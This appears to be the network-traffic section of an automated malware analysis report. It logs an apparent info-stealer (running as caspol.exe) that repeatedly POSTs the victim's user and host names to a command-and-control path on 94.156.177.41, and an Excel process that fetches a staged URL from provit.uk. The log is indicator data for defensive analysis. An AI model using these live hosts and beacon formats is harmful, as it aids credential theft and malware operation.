Nov 21, 2024 01:21:38.140042067 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:39.546247005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49190	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:39.811778069 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:39.931531906 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:41.225311041 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49191	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:41.484728098 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:41.604608059 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:43.072159052 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49192	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:43.329025984 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:43.448688030 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:44.863466024 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49193	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:45.120177984 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:45.241866112 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:46.668967009 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.22	49194	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:47.252156973 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:47.371969938 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:48.817509890 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.22	49195	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:49.087871075 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:49.207568884 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:50.587418079 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.22	49196	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:50.844224930 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:50.964190960 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:52.457573891 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49197	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:52.726937056 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:52.846976042 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:54.325577021 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49198	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:54.597784042 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:54.717406034 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:56.127772093 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:55 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49199	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:56.380079985 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:56.499938965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:57.929815054 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:57 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49200	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:58.197854996 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:21:58.317708969 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:21:59.701589108 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:21:59 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.22	49201	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:21:59.952573061 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:00.072515965 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:01.372283936 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:01 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.22	49202	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:01.654943943 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:01.774544954 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:03.169651031 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.22	49203	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:03.794051886 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:03.913789988 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:05.316179991 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.22	49204	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:05.589916945 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:05.709669113 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:07.045981884 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:06 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.22	49205	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:07.326541901 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:07.446181059 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:08.721000910 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:08 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.22	49206	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:09.047710896 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:09.167577028 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:10.458477974 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:10 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.22	49207	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:10.721070051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:10.840995073 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:12.255867958 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.22	49208	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:13.144752979 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:13.264616966 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:14.673455000 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:14 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.22	49209	94.156.177.41	80	3232	C:\Users\user\AppData\Roaming\caspol.exe

Timestamp	Bytes transferred	Direction	Data
Nov 21, 2024 01:22:14.930888891 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 149 Connection: close
Nov 21, 2024 01:22:15.051075935 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 30 00 36 00 35 00 33 00 36 00 37 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus065367ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 21, 2024 01:22:16.519212008 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 21 Nov 2024 00:22:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49161	198.244.140.41	443	3400	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-21 00:20:30 UTC	386	OUT	GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: provit.uk Connection: Keep-Alive
